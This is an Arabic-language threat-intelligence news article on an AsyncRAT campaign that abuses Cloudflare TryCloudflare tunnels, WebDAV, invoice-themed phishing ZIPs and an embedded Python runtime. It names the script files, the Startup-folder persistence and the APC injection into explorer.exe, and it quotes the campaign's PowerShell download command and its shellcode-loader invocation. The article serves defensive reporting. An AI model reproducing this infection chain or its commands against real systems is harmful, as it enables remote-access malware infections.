كشفت تقارير حديثة عن استغلال برمجية AsyncRAT، وهي أداة وصول عن بعد شائعة، لخدمات الطبقة المجانية من Cloudflare، بما في ذلك تقنية TryCloudflare tunnels، لإخفاء أنشطتها الضارة. ويستغل المهاجمون هذه الخدمات لإخفاء حركة مرورهم الخبيثة ضمن حركة مرور سحابية تبدو طبيعية، مما يزيد من صعوبة الكشف عنها.
تعتمد الهجمات المبلغ عنها على إرسال رسائل بريد إلكتروني تصيدية تحتوي على روابط لملفات ZIP مخزنة على Dropbox. تتم تسمية هذه الملفات لتبدو كفواتير باللغة الألمانية، بهدف خداع المستخدمين وإقناعهم بفتح مستندات الفوترة الروتينية. إن استخدام AsyncRAT لهذه التقنيات يمثل تحديًا جديدًا في مجال الأمن السيبراني.
استغلال AsyncRAT لخدمات Cloudflare
بعد فتح ملف ZIP، يكشف المستخدم عن ملف بامتداد مزدوج، مثل “Rechnung-zu-Auftrag-W19248960825.pdf.url”. هذا الملف، الذي يتظاهر بأنه مستند PDF، هو في الواقع اختصار للإنترنت يبدأ سلسلة الإصابة بالبرمجيات الخبيثة.
من هذا الاختصار، يتصل الملف بمورد WebDAV مستضاف خلف نطاقات trycloudflare.com، حيث يتم تخزين نصوص برمجية متعددة المراحل وملفات دفعات. تعمل هذه النصوص على جلب مكونات إضافية، وإنشاء بيئة Python محلية، ووضع آليات لاستمرار تشغيل البرمجية الخبيثة عند كل إعادة تشغيل للنظام.
آلية الإصابة والوصول عن بعد
يؤدي تحميل هذه المكونات إلى تثبيت حمولة AsyncRAT النهائية، مما يمنح المهاجم سيطرة كاملة عن بعد على جهاز الضحية. تشمل هذه السيطرة إمكانية تسجيل ضغطات المفاتيح، والتقاط لقطات للشاشة، وتنفيذ الأوامر عن بعد.
تم اكتشاف هذه النشاطات بواسطة محللي Trend Micro عبر بيانات تتبع التهديدات. أظهرت البيانات تحميل ملف ZIP الذي يحمل طابع الفواتير عن طريق Outlook وMicrosoft Edge، تليها اتصالات WebDAV إلى بنية تحتية مدعومة من Cloudflare، وتنفيذ الحمولة عبر نصوص برمجية.
تأثير وتقنيات الإخفاء
ربط التحقيق بين العديد من نطاقات trycloudflare.com والخادم الخلفي ومجموعات الملفات نفسها. هذا يشير إلى وجود مجموعة أدوات قابلة لإعادة الاستخدام تستخدم في حملات متعددة. إن استغلال AsyncRAT لـ Cloudflare يمثل ابتكارًا مقلقًا في أساليب التهديد الحديثة.
النتيجة واضحة: من خلال الاعتماد على شبكة Cloudflare الموثوقة واستخدام تنزيلات Python الرسمية، يندمج المهاجمون بسلاسة مع حركة المرور العادية وعمليات البرامج، مما يجعل طرق الحظر التقليدية القائمة على النطاق أو السمعة أقل فعالية.
تضمن ملفات الدفعات (Batch files) التي يتم إسقاطها في مجلد Startup، مثل ahke.bat وolsm.bat، الحفاظ على نشاط حمولة Python. وفي الوقت نفسه، يرى المستخدم فقط نافذة PDF شرعية تُفتح في المتصفح، مما يقلل من الشكوك أثناء مرحلة الاختراق.
تفاصيل آلية الإصابة
تتضمن المرحلة الأولى من النص البرمجي، على سبيل المثال، استدعاء as.wsh لـ anc.wsf، حيث يتم سحب ملفي دفعات، vio.bat و xeno.bat، ثم تنفيذهما من دليل Temp الخاص بالمستخدم باستخدام Windows Script Host.
بعد ذلك، تستخدم ملفات vio.bat و xeno.bat PowerShell لتنزيل حزمة Python 3.14.0 المضمنة الرسمية واستخراجها في مجلد محلي، غالبًا ما يكون C:UsersusernameAppDataLocalz1man. وتظهر أوامر مثل:
powershell -Command "iwr 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' -OutFile '%TEMP%p.zip'"
يتم تعيين الاستمرارية عن طريق حفظ ahke.bat وolsm.bat في مجلد Startup، حيث يتشاركان في تكوين لتشغيل Python مع نص برمجي تحميل يسمى ne.py عند بدء التشغيل.
في النهاية، يقوم ne.py بتنفيذ عملية حقن تعليمات برمجية متعددة الأشكال قائمة على APC في explorer.exe باستخدام Shellcode مشفرة مخزنة في new.bin ومفاتيح من a.txt، ويتم استدعاؤها عبر:
python ne.py -i new.bin -k a.txt
يوضح هذا التحليل التقني المفصل كيف يقوم مشغلو AsyncRAT بسلسلة من تقنيات التشفير السحابي، و WebDAV، و Python، وحقن العمليات للحفاظ على السيطرة على الأنظمة المصابة، مع البقاء مخفيين داخل حركة مرور سحابية ونشاط نظام طبيعية.